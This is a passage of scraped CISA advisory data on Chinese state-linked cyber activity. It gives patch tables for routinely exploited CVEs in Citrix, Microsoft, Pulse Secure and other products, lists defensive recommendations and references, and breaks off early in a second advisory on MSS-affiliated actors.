* **APT41 **(known as Double Dragon) has exploited vulnerabilities in Citrix NetScaler/ADC, Cisco routers, and Zoho ManageEngine Desktop Central to compromise victims.[[16](<https://attack.mitre.org/groups/G0096/>)]\n\n### Mitigations\n\n### Recommended Actions\n\nThe following list provides actionable technical recommendations for IT security professionals to reduce their organization\u2019s overall vulnerability. These recommendations are not exhaustive; rather they focus on the actions that will greatly reduce stakeholders\u2019 attack surface.\n\n 1. **Patch systems and equipment promptly and diligently. **Establishing and consistently maintaining a thorough patching cycle continues to be the best defense against adversary TTPs. Focus on patching critical and high vulnerabilities that allow for remote code execution or denial-of-service on externally-facing (i.e., internet) equipment. Certain vulnerabilities\u2014including CVE-2012-0158 in Microsoft products [[17](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a%20>)], CVE-2019-19781 in Citrix devices [[18](<https://us-cert.cisa.gov/ncas/alerts/aa20-020a>)], and CVE-2020-5902 in BIG-IP Traffic Management User Interface [[19](<https://us-cert.cisa.gov/ncas/current-activity/2020/07/04/f5-releases-security-advisory-big-ip-tmui-rce-vulnerability-cve>)]\u2014have presented APTs with prime targets to gain initial access. Chinese APTs often use existing exploit code to target routinely exploited vulnerabilities [[20](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a%20>)], which present an opportunistic attack that requires limited resources. See table 3 for patch information on CVEs that have been routinely exploited by Chinese APTs. See table 4 for patch information on vulnerabilities that the National Security Agency (NSA) has stated are actively used by Chinese state-sponsored cyber actors.\n\n_Table 3: Patch information for vulnerabilities routinely exploited by Chinese APT actors_\n\n**Vulnerability** | **Vulnerable Products** | **Patch Information** \n---|---|--- \n[CVE-2012-0158](<https://nvd.nist.gov/vuln/detail/CVE-2012-0158>) | \n\nMicrosoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1; Office 2003 Web Components SP3; SQL Server 2000 SP4, 2005 SP4, and 2008 SP2, SP3, and R2; BizTalk Server 2002 SP1; Commerce Server 2002 SP4, 2007 SP2, and 2009 Gold and R2; Visual FoxPro 8.0 SP1 and 9.0 SP2; and Visual Basic 6.0\n\n| \n\n * [Microsoft Security Bulletin MS12-027: Vulnerability in Windows Common Controls Could Allow Remote Code Execution](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-027>) \n[CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) | \n\n * Big-IP devices (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO, CGNAT)\n| \n\n * [F5 Security Advisory: K52145254: TMUI RCE vulnerability CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>) \n[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) | \n\n * Citrix Application Delivery Controller\n * Citrix Gateway\n * Citrix SDWAN WANOP\n\n| \n\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>)\n * [Citrix blog post: security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3](<https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/>)\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>)\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway version 10.5](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>) \n[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) | \n\n * Pulse Connect Secure 9.0R1 - 9.0R3.3, 8.3R1 - 8.3R7, 8.2R1 - 8.2R12, 8.1R1 - 8.1R15\n * Pulse Policy Secure 9.0R1 - 9.0R3.1, 5.4R1 - 5.4R7, 5.3R1 - 5.3R12, 5.2R1 - 5.2R12, 5.1R1 - 5.1R15\n| \n\n * [Pulse Secure Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>) \n[CVE-2019-16920](<https://nvd.nist.gov/vuln/detail/CVE-2019-16920>) | \n\n * D-Link products DIR-655C, DIR-866L, DIR-652, DHP-1565, DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825\n| \n\n * [D-Link Security Advisory: DAP-1533 Rv Ax, DGL-5500 Rv Ax, DHP-1565 Rv Ax, DIR-130 Rv Ax, DIR-330 Rv Ax, DIR-615 Rv Ix, (non-US) DIR-652 Rv Bx, DIR-655 Rv Cx, DIR-825 Rv Cx, DIR-835 Rv Ax, DIR-855L Rv Ax, (non-US) DIR-862 Rv Ax, DIR-866L Rv Ax :: CVE-2019-16920 :: Unauthenticated Remote Code Execution (RCE) Vulnerability](<https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10124>) \n[CVE-2019-16278](<https://nvd.nist.gov/vuln/detail/CVE-2019-16278>) | \n\n * Nostromo 1.9.6 and below\n| \n\n * [Nostromo 1.9.6 Directory Traversal/ Remote Command Execution](<https://packetstormsecurity.com/files/155045/Nostromo-1.9.6-Directory-Traversal-Remote-Command-Execution.html>)\n * [Nostromo 1.9.6 Remote Code Execution](<https://packetstormsecurity.com/files/155802/nostromo-1.9.6-Remote-Code-Execution.html>) \n \n[CVE-2019-1652](<https://nvd.nist.gov/vuln/detail/CVE-2019-1652>) | \n\n * Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers\n| \n\n * [Cisco Security Advisory: Cisco Small Business RV320 and RV325 Routers Command Injection Vulnerability](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject>) \n[CVE-2019-1653](<https://nvd.nist.gov/vuln/detail/CVE-2019-1653>) | \n\n * Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers\n| \n\n * [Cisco Security Advisory: Cisco Small Business RV320 and RV325 Routers Information Disclosure Vulnerability](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info>) \n[CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>) | \n\n * Zoho ManageEngine Desktop Central before 10.0.474\n| \n\n * [ManageEngine Desktop Central remote code execution vulnerability (CVE-2020-10189)](<https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html>) \n \n_Table 4: Patch information for NSA listed vulnerabilities used by Chinese state-sponsored cyber actors [[21](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>)]_\n\n**Vulnerability** | **Vulnerable Products** | **Patch Information** \n---|---|--- \n[CVE-2020-8193](<https://nvd.nist.gov/vuln/detail/CVE-2020-8193>) | \n\n * Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18\n * Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7\n| \n\n * [Citrix Security Bulletin CTX276688](<https://support.citrix.com/article/CTX276688>) \n[CVE-2020-8195](<https://nvd.nist.gov/vuln/detail/CVE-2020-8195>) | \n\n * Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18\n * Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7\n| \n\n * [Citrix Security Bulletin CTX276688](<https://support.citrix.com/article/CTX276688>) \n[CVE-2020-8196](<https://nvd.nist.gov/vuln/detail/CVE-2020-8196>) | \n\n * Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18\n * Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7\n\n| \n\n * [Citrix Security Bulletin CTX276688](<https://support.citrix.com/article/CTX276688>) \n[CVE-2019-0708](<https://nvd.nist.gov/vuln/detail/CVE-2019-0708>) | \n\n * Windows 7 for 32-bit Systems Service Pack 1\n * Windows 7 for x64-based Systems Service Pack 1\n * Windows Server 2008 for 32-bit Systems Service Pack 2\n * Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)\n * Windows Server 2008 for Itanium-Based Systems Service Pack 2\n * Windows Server 2008 for x64-based Systems Service Pack 2\n * Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)\n * Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)\n| \n\n * [Microsoft Security Advisory for CVE-2019-0708](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708>) \n[CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>) | \n\n * MobileIron Core & Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0\n * Sentry versions 9.7.2 and earlier, and 9.8.0;\n * Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier\n| \n\n * [MobileIron Blog: MobileIron Security Updates Available](<https://www.mobileiron.com/en/blog/mobileiron-security-updates-available>) \n[CVE-2020-1350](<https://nvd.nist.gov/vuln/detail/CVE-2020-1350>) | \n\n * Windows Server 2008 for 32-bit Systems Service Pack 2\n * Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)\n * Windows Server 2008 for x64-based Systems Service Pack 2\n * Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)\n * Windows Server 2012\n * Windows Server 2012 (Server Core installation)\n * Windows Server 2012 R2\n * Windows Server 2012 R2 (Server Core installation)\n * Windows Server 2016\n * Windows Server 2016 (Server Core installation)\n * Windows Server 2019\n * Windows Server 2019 (Server Core installation)\n * Windows Server, version 1903 (Server Core installation)\n * Windows Server, version 1909 (Server Core installation)\n * Windows Server, version 2004 (Server Core installation)\n| \n\n * [Microsoft Security Advisory for CVE-2020-1350](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1350>) \n \n[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) | \n\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)\n * Windows Server 2012\n * Windows Server 2012 (Server Core installation)\n * Windows Server 2012 R2\n * Windows Server 2016\n * Windows Server 2019\n * Windows Server 2019 (Server Core installation)\n * Windows Server, version 1903 (Server Core installation)\n * Windows Server, version 1909 (Server Core installation)\n * Windows Server, version 2004 (Server Core installation)\n| \n\n * [Microsoft Security Advisory for CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) \n \n[CVE-2020-1040](<https://nvd.nist.gov/vuln/detail/CVE-2020-1040>) | \n\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)\n * Windows Server 2012\n * Windows Server 2012 (Server Core installation)\n * Windows Server 2012 R2\n * Windows Server 2012 R2 (Server Core installation)\n * Windows Server 2016\n * Windows Server 2016 (Server Core installation)\n| \n\n * [Microsoft Security Advisory for CVE-2020-1040](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1040>) \n[CVE-2018-6789](<https://nvd.nist.gov/vuln/detail/CVE-2018-6789>) | \n\n * Exim before 4.90.1\n| \n\n * [Exim page for CVE-2020-6789](<https://exim.org/static/doc/security/CVE-2018-6789.txt>)\n * [Exim patch information for CVE-2020-6789](<https://git.exim.org/exim.git/commit/cf3cd306062a08969c41a1cdd32c6855f1abecf1>) \n[CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) | \n\n * Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 30\n * Microsoft Exchange Server 2013 Cumulative Update 23\n * Microsoft Exchange Server 2016 Cumulative Update 14\n * Microsoft Exchange Server 2016 Cumulative Update 15\n * Microsoft Exchange Server 2019 Cumulative Update 3\n * Microsoft Exchange Server 2019 Cumulative Update 4\n| \n\n * [Microsoft Security Advisory for CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>) \n[CVE-2018-4939](<https://nvd.nist.gov/vuln/detail/CVE-2018-4939>) | \n\n * ColdFusion Update 5 and earlier versions\n * ColdFusion 11 Update 13 and earlier versions\n| \n\n * [Adobe Security Bulletin APSB18-14](<https://helpx.adobe.com/security/products/coldfusion/apsb18-14.html>) \n[CVE-2015-4852](<https://nvd.nist.gov/vuln/detail/CVE-2015-4852>) | \n\n * Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0\n| \n\n * [Oracle Critical Patch Update Advisory - October 2016](<https://www.oracle.com/security-alerts/cpuoct2016.html>) \n[CVE-2020-2555](<https://nvd.nist.gov/vuln/detail/CVE-2020-2555>) | \n\n * Oracle Coherence product of Oracle Fusion Middleware Middleware; versions 3.7.1.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0.\n| \n\n * [Oracle Critical Patch Update Advisory - January 2020](<https://www.oracle.com/security-alerts/cpujan2020.html>) \n[CVE-2019-3396](<https://nvd.nist.gov/vuln/detail/CVE-2019-3396>) | \n\n * Atlassian Confluence Server before version 6.6.12, from version 6.7.0 before 6.12.3, from version 6.13.0 before 6.13.3), and from version 6.14.0 before 6.14.2\n| \n\n * [Jira Atlassian Confluence Sever and Data Center: Remote code execution via Widget Connector macro - CVE-2019-3396](<https://jira.atlassian.com/browse/CONFSERVER-57974>) \n[CVE-2019-11580](<https://nvd.nist.gov/vuln/detail/CVE-2019-11580>) | \n\n * Atlassian Crowd and Crowd Data Center from version 2.1.0 before 3.0.5, from version 3.1.0 before 3.1.6, from version 3.2.0 before 3.2.8, from version 3.3.0 before 3.3.5, and from version 3.4.0 before 3.4.4\n| \n\n * [Jira Atlassian Crowd: Crowd - pdkinstall development plugin incorrectly enabled - CVE-2019-11580](<https://jira.atlassian.com/browse/CWD-5388>) \n[CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>) | \n\n * Zoho ManageEngine Desktop Central before 10.0.474\n| \n\n * [ManageEngine Desktop Central remote code execution vulnerability (CVE-2020-10189)](<https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html>) \n[CVE-2019-18935](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>) | \n\n * Progress Telerik UI for ASP.NET AJAX through 2019.3.1023\n| \n\n * [Telerik: ASP.NET AJAX: Allows JavaScriptSerializer Deserialization](<https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization>) \n[CVE-2020-0601](<https://nvd.nist.gov/vuln/detail/CVE-2020-0601>) | \n\n * Windows 10 for 32-bit Systems\n * Windows 10 for x64-based Systems\n * Windows 10 Version 1607 for 32-bit Systems\n * Windows 10 Version 1607 for x64-based Systems\n * Windows 10 Version 1709 for 32-bit Systems\n * Windows 10 Version 1709 for ARM64-based Systems\n * Windows 10 Version 1709 for x64-based Systems\n * Windows 10 Version 1803 for 32-bit Systems\n * Windows 10 Version 1803 for ARM64-based Systems\n * Windows 10 Version 1803 for x64-based Systems\n * Windows 10 Version 1809 for 32-bit Systems\n * Windows 10 Version 1809 for ARM64-based Systems\n * Windows 10 Version 1809 for x64-based Systems\n * Windows 10 Version 1903 for 32-bit Systems\n * Windows 10 Version 1903 for ARM64-based Systems\n * Windows 10 Version 1903 for x64-based Systems\n * Windows 10 Version 1909 for 32-bit Systems\n * Windows 10 Version 1909 for ARM64-based Systems\n * Windows 10 Version 1909 for x64-based Systems\n * Windows Server 2016\n * Windows Server 2016 (Server Core installation)\n * Windows Server 2019\n * Windows Server 2019 (Server Core installation)\n * Windows Server, version 1803 (Server Core Installation)\n * Windows Server, version 1903 (Server Core installation)\n * Windows Server, version 1909 (Server Core installation)\n| \n\n * [Microsoft Security Advisory for CVE-2020-0601](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0601>) \n[CVE-2019-0803](<https://nvd.nist.gov/vuln/detail/CVE-2019-0803>) | \n\n * Windows 10 for 32-bit Systems\n * Windows 10 for x64-based Systems\n * Windows 10 Version 1607 for 32-bit Systems\n * Windows 10 Version 1607 for x64-based Systems\n * Windows 10 Version 1703 for 32-bit Systems\n * Windows 10 Version 1703 for x64-based Systems\n * Windows 10 Version 1709 for 32-bit Systems\n * Windows 10 Version 1709 for ARM64-based Systems\n * Windows 10 Version 1709 for x64-based Systems\n * Windows 10 Version 1803 for 32-bit Systems\n * Windows 10 Version 1803 for ARM64-based Systems\n * Windows 10 Version 1803 for x64-based Systems\n * Windows 10 Version 1809 for 32-bit Systems\n * Windows 10 Version 1809 for ARM64-based Systems\n * Windows 10 Version 1809 for x64-based Systems\n * Windows 7 for 32-bit Systems Service Pack 1\n * Windows 7 for x64-based Systems Service Pack 1\n * Windows 8.1 for 32-bit systems\n * Windows 8.1 for x64-based systems\n * Windows RT 8.1\n * Windows Server 2008 for 32-bit Systems Service Pack 2\n * Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)\n * Windows Server 2008 for Itanium-Based Systems Service Pack 2\n * Windows Server 2008 for x64-based Systems Service Pack\n * Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)\n * Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)\n * Windows Server 2012\n * Windows Server 2012 (Server Core installation)\n * Windows Server 2012 R2\n * Windows Server 2012 R2 (Server Core installation)\n * Windows Server 2016\n * Windows Server 2016 (Server Core installation)\n * Windows Server 2019\n * Windows Server 2019 (Server Core installation)\n * Windows Server, version 1803 (Server Core Installation)\n| \n\n * [Microsoft Security Advisory for CVE-2019-0803](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0803>) \n \n[CVE-2017-6327](<https://nvd.nist.gov/vuln/detail/CVE-2017-6327>) | \n\n * Symantec Messaging Gateway before 10.6.3-267\n| \n\n * [Broadcom Security Updates Detial for CVE-2017-6327 and CVE-2017-6328 ](<https://www.broadcom.com/support/security-center/securityupdates/detail?fid=security_advisory&pvid=security_advisory&year=&suid=20170810_00>) \n[CVE-2020-3118](<https://nvd.nist.gov/vuln/detail/CVE-2020-3118>) | \n\n * ASR 9000 Series Aggregation Services Routers\n * Carrier Routing System (CRS)\n * IOS XRv 9000 Router\n * Network Convergence System (NCS) 540 Series Routers\n * NCS 560 Series Routers\n * NCS 1000 Series Routers\n * NCS 5000 Series Routers\n * NCS 5500 Series Routers\n * NCS 6000 Series Routers\n| \n\n * [Cisco Security Advisory cisco-sa-20200205-iosxr-cdp-rce](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200205-iosxr-cdp-rce>) \n[CVE-2020-8515](<https://nvd.nist.gov/vuln/detail/CVE-2020-8515>) | \n\n * DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices\n| \n\n * [Draytek Security Advisory: Vigor3900 / Vigor2960 / Vigor300B Router Web Management Page Vulnerability (CVE-2020-8515)](<https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-\$cve-2020-8515\$/>) \n \n 2. **Implement rigorous configuration management programs. **Audit configuration management programs to ensure they can track and mitigate emerging threats. Review system configurations for misconfigurations and security weaknesses. Implementing a robust configuration and patch management program hinders sophisticated APT operations by limiting the effectiveness of opportunistic attacks. \n\n 3. **Disable unnecessary ports, protocols, and services.** Review network security device logs and determine whether to shut off unnecessary ports and protocols. Monitor common ports and protocols for C2 activity. Turn off or disable any unnecessary services or functionality within devices (e.g., universal plug and play [UPnP], PowerShell). \n\n 4. **Enhance monitoring of network and email traffic.** Review network signatures and indicators for focused operations activities, monitor for new phishing themes, and adjust email rules accordingly. Follow best practices of restricting attachments via email. Ensure that log information is aggregated and correlated to enable maximum detection capabilities, with a focus on monitoring for account misuse. \n\n 5. **Use protection capabilities to stop malicious activity.** Implement antivirus software and other endpoint protection capabilities to automatically detect and prevent malicious files from executing. Use network intrusion detection and prevention systems to identify and prevent commonly employed adversarial malware and limit nefarious data transfers.\n\n### Contact Information\n\nCISA encourages recipients of this report to contribute any additional information that they may have related to this threat. For any questions related to this report, please contact CISA at:\n\n * 1-888-282-0870 (From outside the United States: +1-703-235-8832)\n * [Central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov>) (UNCLASS)\n\nCISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on the CISA homepage at <http://www.us-cert.cisa.gov/>.\n\n### References\n\n[[1] White House Publication: How China\u2019s Economic Aggression Threatens the Technologies and Intellectual Property of the United States and the World ](<https://www.whitehouse.gov/wp-content/uploads/2018/06/FINAL-China-Technology-Report-6.18.18-PDF.pdf>)\n\n[[2] Congressional Research Services: 'Made in China 2025' Industrial Policies: Issues for Congress ](<https://fas.org/sgp/crs/row/IF10964.pdf>)\n\n[[3] Council on Foreign Relations: Is \u2018Made in China 2025\u2019 a Threat to Global Trade ](<https://www.cfr.org/backgrounder/made-china-2025-threat-global-trade>)\n\n[[4] Mandiant: APT1 Exposing One of China\u2019s Cyber Espionage Units ](<https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf>)\n\n[[5] U.S. Department of Justice (DOJ) Press Release: U.S. Charges Five Chinese Military Hackers for Cyber Espionage Against U.S. Corporations and a Labor Organization for Commercial Advantage](<https://www.justice.gov/opa/pr/us-charges-five-chinese-military-hackers-cyber-espionage-against-us-corporations-and-labor>)\n\n[[6] CISA Alert TA17-117A: Intrusions Affecting Multiple Victims Across Multiple Sectors](<https://us-cert.cisa.gov/ncas/alerts/TA17-117A>)\n\n[[7] DOJ Press Release: Deputy Attorney General Rod J. Rodenstein Announces Charges Against Chinese Hackers](<https://www.justice.gov/opa/speech/deputy-attorney-general-rod-j-rosenstein-announces-charges-against-chinese-hackers>)\n\n[[8] CISA Awareness Briefing: Chinese Cyber Activity Targeting Managed Service Providers](<https://us-cert.cisa.gov/sites/default/files/publications/Chinese-Cyber-Activity-Targeting-Managed-Service-Providers.pdf>)\n\n[[9] DOJ Press Release: Deputy Attorney General William P. Barr Announces Indictment of Four Members of China\u2019s Military for Hacking into Equifax](<https://www.justice.gov/opa/speech/attorney-general-william-p-barr-announces-indictment-four-members-china-s-military>)\n\n[[10] CISA Press Release: FBI and CISA Warn Against Chinese Targeting of COVID-19 Research Organizations ](<https://www.cisa.gov/news/2020/05/13/fbi-and-cisa-warn-against-chinese-targeting-covid-19-research-organizations>)\n\n[[11] CISA Alert AA20-126A: APT Groups Target Healthcare and Essential Services](<https://us-cert.cisa.gov/ncas/alerts/AA20126A>)\n\n[[12] CISA Current Activity (CA): Chinese Malicious Cyber Activity](<https://us-cert.cisa.gov/ncas/current-activity/2020/08/03/chinese-malicious-cyber-activity>)\n\n[[13] FireEye Advanced Persistent Threat Groups](<https://www.fireeye.com/current-threats/apt-groups.html>)\n\n[[14] MITRE ATT&CK: APT3](<https://attack.mitre.org/groups/G0022/>)\n\n[[15] MITRE ATT&CK: APT19](<https://attack.mitre.org/groups/G0073/>)\n\n[[16] MITRE ATT&CK: APT41](<https://attack.mitre.org/groups/G0096/>)\n\n[[17] CISA Alert AA20-133A: Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>)\n\n[[18] CISA Alert AA20-020A: Critical Vulnerability in Citrix Application Delivery Controller, Gateway, and SD-WAN WANOP](<https://us-cert.cisa.gov/ncas/alerts/aa20-020a>)\n\n[[19] CISA CA: F5 Releases Security Advisory for BIP-IP TMUI RCE Vulnerability, CVE-2020-5902](<https://us-cert.cisa.gov/ncas/current-activity/2020/07/04/f5-releases-security-advisory-big-ip-tmui-rce-vulnerability-cve>)\n\n[[20] CISA Alert AA20-133A: Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>)\n\n[[21] NSA Advisory: Chinese State-Sponsored Actors Exploit Publicly Known Vulnerabilities](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>)\n\n### Revisions\n\nOctober 1, 2020: Initial Version|October 20, 2020: Recommended Actions Section Updated\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-10-20T12:00:00", "type": "ics", "title": "Potential for China Cyber Response to Heightened U.S.\u2013China Tensions", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2015-4852", "CVE-2017-6327", "CVE-2017-6328", "CVE-2018-4939", "CVE-2018-6789", "CVE-2019-0708", "CVE-2019-0803", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-16278", "CVE-2019-1652", "CVE-2019-1653", "CVE-2019-16920", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2020-0601", "CVE-2020-0688", "CVE-2020-10189", "CVE-2020-1040", "CVE-2020-1350", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-2555", "CVE-2020-3118", "CVE-2020-5902", "CVE-2020-6789", "CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8515"], "modified": "2020-10-20T12:00:00", "id": "AA20-275A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-275a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-03T17:30:22", "description": "### Summary\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has consistently observed Chinese Ministry of State Security (MSS)-affiliated cyber threat actors using publicly available information sources and common, well-known tactics, techniques, and procedures (TTPs) to target U.S. Government agencies. CISA has observed these\u2014and other threat actors with varying degrees of skill\u2014routinely using open-source information to plan and execute cyber operations. CISA leveraged the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) and Pre-ATT&CK frameworks to characterize the TTPs used by Chinese MSS-affiliated actors. This product was written by CISA with contributions by the Federal Bureau of Investigation (FBI).\n\n### Key Takeaways\n\n * Chinese MSS-affiliated cyber threat actors use open-source information to plan and conduct cyber operations.\n * Chinese MSS-affiliated cyber threat actors use readily available exploits and exploit toolkits to quickly engage target networks.\n * Maintaining a rigorous patching cycle continues to be the best defense against the most frequently used attacks.\n * If critical vulnerabilities remain unpatched, cyber threat actors can carry out attacks without the need to develop custom malware and exploits or use previously unknown vulnerabilities to target a network.\n * This Advisory identifies some of the more common\u2014yet most effective\u2014TTPs employed by cyber threat actors, including Chinese MSS-affiliated cyber threat actors.\n\n[Click here](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-258A-Chinese_Ministry_of_State_Security-Affiliated_Cyber_Threat_Actor_Activity_S508C.pdf>) for a PDF version of this report.\n\n### Technical Details\n\nThrough the operation of the National Cybersecurity Protection System (NCPS) and by fulfilling its mission as the national risk advisor, CISA has observed Chinese MSS-affiliated cyber threat actors operating from the People\u2019s Republic of China using commercially available information sources and open-source exploitation tools to target U.S. Government agency networks.\n\nAccording to a recent U.S. Department of Justice indictment, MSS-affiliated actors have targeted various industries across the United States and other countries\u2014including high-tech manufacturing; medical device, civil, and industrial engineering; business, educational, and gaming software; solar energy; pharmaceuticals; and defense\u2014in a campaign that lasted over ten years.[[1](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>)] These hackers acted for both their own personal gain and the benefit of the Chinese MSS.[[2](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>)]\n\nAccording to the indictment,\n\n_To conceal the theft of information from victim networks and otherwise evade detection, the defendants typically packaged victim data in encrypted Roshal Archive Compressed files (RAR files), changed RAR file and victim documents\u2019 names and extensions (e.g., from \u201c.rar\u201d to \u201c.jpg\u201d) and system timestamps, and concealed programs and documents at innocuous-seeming locations on victim networks and in victim networks\u2019 \u201crecycle bins.\u201d The defendants frequently returned to re-victimize companies, government entities, and organizations from which they had previously stolen data, in some cases years after the initial successful data theft. In several instances, however, the 